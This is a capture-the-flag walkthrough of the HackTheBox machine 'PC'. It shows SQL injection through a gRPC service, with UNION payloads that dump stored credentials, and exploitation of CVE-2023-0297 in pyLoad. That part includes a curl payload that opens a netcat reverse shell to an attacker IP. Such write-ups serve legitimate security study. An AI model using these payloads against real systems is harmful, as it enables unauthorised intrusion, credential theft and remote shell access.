PC — HackTheBox
PC is an easy machine from HackTheBox. It involves identifying and exploiting SQL injection in gRPC service to dump database for foothold, and exploiting CVE-2023–0297 (RCE in pyLoad) for escalating privileges to root.
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown Port 50051
Connecting to port 50051, it gives the following error after some time. We can google this error to identify the running service on this port.
Google shows that it’s gRPC service
gRPC is a modern, open source, high-performance remote procedure call (RPC) framework that can run anywhere. gRPC enables client and server applications to communicate transparently, and simplifies the building of connected systems.
We can interact with the service using gRPC UI.
Download the grpcui binary and run it
./grpcui -plaintext 10.10.11.214:50051
Now in the browser, we can interact with service and invoke calls
I provided the admin:admin username and password for LoginUser method and got the following response
Now changing the method to getInfo, provided the id and token that we got when logged in
It gave following message
SQL Injection
Again going back and adding the ' in id
and then it gives following error. From error message, it seems like a python application.
Now, we can confirm that it’s vulnerable to SQL injection by adding the SQL comment
and this time it works normally
The next step is identify the type and number of columns being returned. It can be identified by following payload that only one column is returned
Next we determine that it’s a sqlite db and using following payload, we find that there are two tables (accounts and messages) in the db.
101 UNION SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -
The accounts table interesting. Using following payload, the columns in the table can be determined
101 UNION SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='accounts'-- -
Finally, using following, we dump the accounts table and get two credentials. One that we already know and other one is new.
101 UNION SELECT group_concat(username || ":" || password,";") from accounts-- -
Using the new set of credentials, we can login via SSH
Privilege Escalation
Checking the port, it seems that port 8000 is open internally.
Curling the url, it seems to be redirecting on some sorta login page
We can forward this port on our host to further test it
ssh -L 8000:127.0.0.1:8000 sau@10.10.11.214
And access it on localhost. It’s pyload login page.
Pyload is a free and open source download manager written in Python and designed to be extremely lightweight, easily extensible and fully manageable via web.
The credentials that we already have, does not work. Searching on google, it can be found that it’s vulnerable to CVE-2023–0297.
We can confirm the vulnerability by checking the version
And also by exploiting it using the provided payload
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"id%20>%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'
Finally, we can get a reverse shell or just read the flag. I got the reverse shell using following payload
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.14.82%20443%20%3E%2Ftmp%2Ff\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'
References
- gRPC security: https://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9
- CVE-2023–0297 Pyload RCE: https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad
